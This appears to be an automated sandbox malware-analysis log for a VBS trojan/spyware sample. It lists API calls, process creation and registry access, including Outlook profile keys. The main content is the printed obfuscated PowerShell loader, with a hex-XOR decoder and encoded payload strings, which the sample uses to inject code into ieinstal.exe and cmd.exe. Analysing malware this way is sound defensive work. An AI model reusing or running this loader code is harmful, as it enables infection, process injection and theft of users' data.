Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749860 NtQuerySystemInformation,LdrInitializeThunk,	13_2_22749860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749840 NtDelayExecution,LdrInitializeThunk,	13_2_22749840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227498F0 NtReadVirtualMemory,LdrInitializeThunk,	13_2_227498F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749540 NtReadFile,LdrInitializeThunk,	13_2_22749540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749910 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_22749910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227499A0 NtCreateSection,LdrInitializeThunk,	13_2_227499A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749670 NtQueryInformationProcess,	13_2_22749670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749650 NtQueryValueKey,	13_2_22749650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749610 NtEnumerateValueKey,	13_2_22749610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749A10 NtQuerySection,	13_2_22749A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749A00 NtProtectVirtualMemory,	13_2_22749A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227496D0 NtCreateKey,	13_2_227496D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749A80 NtOpenDirectoryObject,	13_2_22749A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749770 NtSetInformationFile,	13_2_22749770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2274A770 NtOpenThread,	13_2_2274A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749760 NtOpenProcess,	13_2_22749760
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019B00 NtSetValueKey,LdrInitializeThunk,	17_2_03019B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019710 NtQueryInformationToken,LdrInitializeThunk,	17_2_03019710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019780 NtMapViewOfSection,LdrInitializeThunk,	17_2_03019780
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019FE0 NtCreateMutant,LdrInitializeThunk,	17_2_03019FE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019A50 NtCreateFile,LdrInitializeThunk,	17_2_03019A50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030196D0 NtCreateKey,LdrInitializeThunk,	17_2_030196D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030196E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_030196E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_03019910
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019540 NtReadFile,LdrInitializeThunk,	17_2_03019540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019560 NtWriteFile,LdrInitializeThunk,	17_2_03019560
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030199A0 NtCreateSection,LdrInitializeThunk,	17_2_030199A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030195D0 NtClose,LdrInitializeThunk,	17_2_030195D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019840 NtDelayExecution,LdrInitializeThunk,	17_2_03019840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_03019860
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0301A710 NtOpenProcessToken,	17_2_0301A710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019730 NtQueryVirtualMemory,	17_2_03019730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019760 NtOpenProcess,	17_2_03019760
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019770 NtSetInformationFile,	17_2_03019770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0301A770 NtOpenThread,	17_2_0301A770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030197A0 NtUnmapViewOfSection,	17_2_030197A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0301A3B0 NtGetContextThread,	17_2_0301A3B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019A00 NtProtectVirtualMemory,	17_2_03019A00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019610 NtEnumerateValueKey,	17_2_03019610
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019A10 NtQuerySection,	17_2_03019A10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019A20 NtResumeThread,	17_2_03019A20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019650 NtQueryValueKey,	17_2_03019650
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019660 NtAllocateVirtualMemory,	17_2_03019660
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019670 NtQueryInformationProcess,	17_2_03019670
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019A80 NtOpenDirectoryObject,	17_2_03019A80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019520 NtWaitForSingleObject,	17_2_03019520
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0301AD30 NtSetContextThread,	17_2_0301AD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019950 NtQueueApcThread,	17_2_03019950
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030199D0 NtCreateProcessEx,	17_2_030199D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030195F0 NtQueryInformationFile,	17_2_030195F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03019820 NtEnumerateKey,	17_2_03019820
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0301B040 NtSuspendThread,	17_2_0301B040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030198A0 NtWriteVirtualMemory,	17_2_030198A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030198F0 NtReadVirtualMemory,	17_2_030198F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1C890 NtDeleteFile,	17_2_02B1C890
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1C8C0 NtClose,	17_2_02B1C8C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1C840 NtReadFile,	17_2_02B1C840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1C790 NtCreateFile,	17_2_02B1C790
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1C8BA NtClose,	17_2_02B1C8BA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1C88A NtDeleteFile,	17_2_02B1C88A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1C78A NtCreateFile,	17_2_02B1C78A

Source: GlobalImagingDocuments9575734549684.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GlobalImagingDocuments9575734549684.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Croupiersr02 { param([String]$Tilbliv); $Fodfst = $Tilbliv.Length; $Skalletef = New-Object byte[] ($Fodfst / 2); For($dependens=0; $dependens -lt $Fodfst; $dependens+=2){ $osteopla = $Tilbliv.Substring($dependens, 2); $Skalletef[$dependens/2] = [convert]::ToByte($osteopla, 16); $Skalletef[$dependens/2] = ($Skalletef[$dependens/2] -bxor 102); } [String][System.Text.Encoding]::ASCII.GetString($Skalletef);}Set-Content 'E:\Croupiersr03' '2';$Depra = Get-Content 'E:\Croupiersr03';$Boug0=Croupiersr02 '351F1512030B48020A0A';if ($Depra -eq '2') {$Boug0=''};$Boug1=Croupiersr02 '2B0F0514091509001248310F085554483308150700032807120F10032B03120E090215';$Boug2=Croupiersr02 '2103123614090527020214031515';$Boug3=Croupiersr02 '351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A03340300';$Boug4=Croupiersr02 '1512140F0801';$Boug5=Croupiersr02 '2103122B0902130A032E0708020A03';$Boug6=Croupiersr02 '3432351603050F070A28070B034A462E0F0203241F350F014A463613040A0F05';$Boug7=Croupiersr02 '341308120F0B034A462B070807010302';$Boug8=Croupiersr02 '3403000A030512030222030A0301071203';$Boug9=Croupiersr02 '2F082B030B09141F2B0902130A03';$Sprge0=Croupiersr02 '2B1F22030A0301071203321F1603';$Sprge1=Croupiersr02 '250A0715154A463613040A0F054A463503070A03024A462708150F250A0715154A4627131209250A071515';$Sprge2=Croupiersr02 '2F0810090D03';$Sprge3=Croupiersr02 '3613040A0F054A462E0F0203241F350F014A46280311350A09124A46300F141213070A';$Sprge4=Croupiersr02 '300F141213070A270A0A0905';$Sprge5=Croupiersr02 '0812020A0A';$Sprge6=Croupiersr02 '281236140912030512300F141213070A2B030B09141F';$Sprge7=Croupiersr02 '2F233E';$Sprge8=Croupiersr02 '3A';$Frekvenss=Croupiersr02 '333523345554';$Hematopat=Croupiersr02 '25070A0A310F080209113614090527';function fkp {Param ($Fortrng49, $Fjasende) ;$Forth0 =Croupiersr02 '420414070503141F0D465B464E3D27161622090B070F083B5C5C2513141403081222090B070F0848210312271515030B040A0F03154E4F461A46310E0314034B29040C030512461D46423948210A0904070A271515030B040A1F2507050E03464B270802464239482A090507120F09084835160A0F124E4235161401035E4F3D4B573B48231713070A154E4224091301564F461B4F48210312321F16034E4224091301574F';&($Sprge7) $Forth0;$Forth5 = Croupiersr02 '4227151203080F150B465B46420414070503141F0D482103122B03120E09024E4224091301544A463D321F16033D3B3B46264E4224091301554A464224091301524F4F';&($Sprge7) $Forth5;$Forth1 = Croupiersr02 '140312131408464227151203080F150B482F0810090D034E4208130A0A4A46264E3D351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403003B4E2803114B29040C03051246351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403004E4E2803114B29040C030512462F08123612144F4A464E420414070503141F0D482103122B03120E09024E4224091301534F4F482F0810090D034E4208130A0A4A46264E4220091412140801525F4F4F4F4F4A4642200C0715030802034F4F';&($Sprge7) $Forth1;}function GDT {Param ([Parame
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aF	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Croupiersr02 { param([String]$Tilbliv); $Fodfst = $Tilbliv.Length; $Skalletef = New-Object byte[] ($Fodfst / 2); For($dependens=0; $dependens -lt $Fodfst; $dependens+=2){ $osteopla = $Tilbliv.Substring($dependens, 2); $Skalletef[$dependens/2] = [convert]::ToByte($osteopla, 16); $Skalletef[$dependens/2] = ($Skalletef[$dependens/2] -bxor 102); } [String][System.Text.Encoding]::ASCII.GetString($Skalletef);}Set-Content 'E:\Croupiersr03' '2';$Depra = Get-Content 'E:\Croupiersr03';$Boug0=Croupiersr02 '351F1512030B48020A0A';if ($Depra -eq '2') {$Boug0=''};$Boug1=Croupiersr02 '2B0F0514091509001248310F085554483308150700032807120F10032B03120E090215';$Boug2=Croupiersr02 '2103123614090527020214031515';$Boug3=Croupiersr02 '351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A03340300';$Boug4=Croupiersr02 '1512140F0801';$Boug5=Croupiersr02 '2103122B0902130A032E0708020A03';$Boug6=Croupiersr02 '3432351603050F070A28070B034A462E0F0203241F350F014A463613040A0F05';$Boug7=Croupiersr02 '341308120F0B034A462B070807010302';$Boug8=Croupiersr02 '3403000A030512030222030A0301071203';$Boug9=Croupiersr02 '2F082B030B09141F2B0902130A03';$Sprge0=Croupiersr02 '2B1F22030A0301071203321F1603';$Sprge1=Croupiersr02 '250A0715154A463613040A0F054A463503070A03024A462708150F250A0715154A4627131209250A071515';$Sprge2=Croupiersr02 '2F0810090D03';$Sprge3=Croupiersr02 '3613040A0F054A462E0F0203241F350F014A46280311350A09124A46300F141213070A';$Sprge4=Croupiersr02 '300F141213070A270A0A0905';$Sprge5=Croupiersr02 '0812020A0A';$Sprge6=Croupiersr02 '281236140912030512300F141213070A2B030B09141F';$Sprge7=Croupiersr02 '2F233E';$Sprge8=Croupiersr02 '3A';$Frekvenss=Croupiersr02 '333523345554';$Hematopat=Croupiersr02 '25070A0A310F080209113614090527';function fkp {Param ($Fortrng49, $Fjasende) ;$Forth0 =Croupiersr02 '420414070503141F0D465B464E3D27161622090B070F083B5C5C2513141403081222090B070F0848210312271515030B040A0F03154E4F461A46310E0314034B29040C030512461D46423948210A0904070A271515030B040A1F2507050E03464B270802464239482A090507120F09084835160A0F124E4235161401035E4F3D4B573B48231713070A154E4224091301564F461B4F48210312321F16034E4224091301574F';&($Sprge7) $Forth0;$Forth5 = Croupiersr02 '4227151203080F150B465B46420414070503141F0D482103122B03120E09024E4224091301544A463D321F16033D3B3B46264E4224091301554A464224091301524F4F';&($Sprge7) $Forth5;$Forth1 = Croupiersr02 '140312131408464227151203080F150B482F0810090D034E4208130A0A4A46264E3D351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403003B4E2803114B29040C03051246351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403004E4E2803114B29040C030512462F08123612144F4A464E420414070503141F0D482103122B03120E09024E4224091301534F4F482F0810090D034E4208130A0A4A46264E4220091412140801525F4F4F4F4F4A4642200C0715030802034F4F';&($Sprge7) $Forth1;}function GDT {Param ([Parame	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suqe02n1.jxp.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@13/6@16/12

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GlobalImagingDocuments9575734549684.vbs"

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: cmd.pdbUGP source: ieinstal.exe, 0000000D.00000002.535523454.0000000022600000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 0000000D.00000003.497892554.0000000022539000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000000D.00000003.497250107.0000000022501000.00000004.00000020.00020000.00000000.sdmp
